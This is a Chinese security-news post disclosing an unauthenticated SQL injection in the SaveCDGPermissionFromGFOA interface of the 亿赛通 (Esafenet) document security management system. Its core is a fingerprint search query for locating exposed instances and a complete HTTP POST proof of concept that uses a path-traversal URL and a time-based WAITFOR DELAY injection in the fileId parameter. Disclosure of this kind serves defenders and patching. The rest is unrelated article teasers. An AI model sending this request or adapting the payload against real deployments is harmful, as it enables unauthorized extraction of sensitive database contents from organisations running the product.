SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

赞 (0)

0 0

要避免的 9 个 SQL 错误

上一篇 2024年6月5日下午3:02

SqlSugar，就这个Feel 倍儿爽！

下一篇 2024年6月5日下午3:20

baiduspider是什么意思，baiduspider怎么用

你听说过网站建设和设计行业的baiduspider吗？它是一个什么样的奇迹？它的外观对一个网站有何影响？怎样才能让自己的网站适合爬行？怎样才能防止恶意爬行？今天我们就来揭开这个谜团…

牛晓晓
行业资讯 2024年4月18日
00
如何使用Linux mkdir命令创建新目录？

如果你是一名Linux系统的使用者，那么你一定会经常使用到mkdir命令来创建新目录。但是，你是否真的了解这个命令的全部功能和使用方法呢？今天，我将带你一起探索Linux mkdi…

牛晓晓
行业资讯 2024年4月4日
00
安徽seo推广，合肥网站制作推广

如今，常见的网站推广渠道包括搜索引擎优化（SEO）、搜索引擎营销（SEM）、社交媒体营销、内容营销等。每个渠道都有自己的特点和范围，您应该根据您公司的情况选择最适合您的推广渠道。 …

牛晓晓
行业资讯 2024年4月12日
00
如何选择适合企业的ISA防火墙？

网络安全是当今企业发展中不可忽视的重要因素，而ISA防火墙作为网络安全加速行业的重要一环，其选择更是关系到企业的信息安全和发展。但是在众多的ISA防火墙产品中，如何选择适合企业的防…

牛晓晓
行业资讯 2024年4月16日
00

发表回复